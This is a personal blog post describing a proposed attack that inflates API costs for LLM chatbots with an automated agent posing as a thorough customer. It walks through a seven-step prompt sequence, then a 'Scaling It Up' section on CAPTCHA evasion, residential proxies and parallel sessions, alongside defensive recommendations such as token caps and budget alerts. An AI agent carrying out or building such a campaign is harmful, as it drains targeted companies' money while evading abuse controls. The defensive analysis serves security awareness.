Let's burn some Tokens! - AI Chatbot Cost Exploitation as an Attack Vector

5 min read
#security#ai#llm#chatbots#cost-exploitation

Over the last year(s), many companies have rolled out AI slop chatbots - sometimes even customer-facing - to improve product discovery, support, and conversion. In most cases, these systems are thin wrappers around commercial LLM APIs. And in many cases, cost controls are... let's say non-existent.

And to be honest: I'm getting really tired of this whole AI bubble and especially chatbots.

The Idea

So, I've got an idea - how about building a tool that doesn't exploit bugs or bypass auth, but behaves like an overly engaged, perfectly valid user?

Here's what it would do:

  • Mimic natural conversation flows, just repeat itself. A lot.
  • Request additional context, references, and "helpful clarifications" on every response.
  • Request output formats known to be expensive - Hi XML!
  • Encourage maximal verbosity and multi-party reasoning.

Nothing illegal. Nothing obviously malicious. Just very, very costly.

Why This Works

Most AI chatbot deployments I've seen share a few common traits:

  1. No per-session token limits - the chatbot will happily generate 10,000+ tokens per response if you ask nicely.
  2. No rate limiting per user - or if there is, it's trivially high.
  3. No cost awareness - the software backend just forwards everything to the API and the carbon-based backend pays whatever the bill says.
  4. No conversation depth limits - you can keep a session going indefinitely, accumulating context window costs.

The pricing model of most LLM APIs is straightforward: you pay per token, both input and output. A single conversation that keeps growing its context while requesting verbose, structured output can rack up significant costs surprisingly fast.

The Attack Surface

Consider a typical e-commerce chatbot. It's there to help you find products, answer questions, maybe even handle returns. Now imagine an automated agent that:

  1. Opens a conversation asking about a product category.
  2. Asks the bot to list all available options with detailed specifications.
  3. Requests the same information in XML format "for my accessibility tool".
  4. Asks for comparisons between products, requesting pros/cons in a structured table.
  5. Follows up with "Can you also include customer reviews and ratings for each?"
  6. Asks it to "summarize everything we've discussed so far" (forcing the model to process the entire conversation again).
  7. Repeats from step 2 with a slightly different product category.

Every single one of these requests is something a legitimate customer might ask. There's no prompt injection, no jailbreaking, no auth bypass. Just a user who really, really wants to be thorough about their purchase decision. Move along, please! Nothing to see here.

Scaling It Up

Now wrap this in Selenium (or Playwright, if you prefer) to blow right through JavaScript challenges and CAPTCHAs. Run it from residential proxies to avoid IP-based blocking. Randomize timing to look human. Run 50 of these in parallel.

The cost per conversation at current API pricing (thinking about o1-level models or Claude with extended thinking) could easily hit several dollars. Multiply that by thousands of concurrent sessions, and you're looking at a very expensive month for whoever is paying the API bill.

Why I Think This Matters

I honestly believe that this is a valid attack vector that could cost HUGE amounts of money for the targeted companies. Most organizations deploying these chatbots have:

  • No budget alerts tied to their API usage
  • No anomaly detection on conversation patterns
  • No per-user or per-session cost caps
  • No circuit breakers for runaway API spend

This is the cloud billing equivalent of leaving your database exposed on the internet without a password. Except it's worse, because the "attacker" looks exactly like a legitimate user.

What Should Companies Do?

If you're running a customer-facing AI chatbot, here's what you should be doing right now:

  • Set hard per-session token limits - both input and output.
  • Implement per-user rate limiting that accounts for token consumption, not just request count.
  • Add budget alerts and circuit breakers on your API spend.
  • Monitor conversation patterns for anomalies like unusually long sessions or repetitive query structures.
  • Use cheaper models for simple queries - not every "what are your opening hours?" needs GPT-4.
  • Cache common responses instead of generating them fresh every time.
  • Set conversation depth limits - after N turns, offer to start a new session or escalate to a human.
  • Educate your team about the cost implications of LLM usage and the potential for abuse.
  • Get rid of chatbots where they don't make sense - sometimes, a simple FAQ page is better. Or a human support agent. I'm looking at you, companies that shoehorn chatbots into every possible customer interaction.

The Plan

  1. Build the tool.
  2. Bring it to a publicly usable state.
  3. Publish it as OSS.
  4. Watch the world burn.

I haven't found any existing project like this yet - if you know of something similar, please let me know. I'd love to contribute rather than reinvent the wheel.

The goal isn't to cause damage - it's to prove that this attack vector is real, trivial and cheap to exploit, and that companies need to take API cost security as seriously as they should take application security.

Because right now? Most of them don't.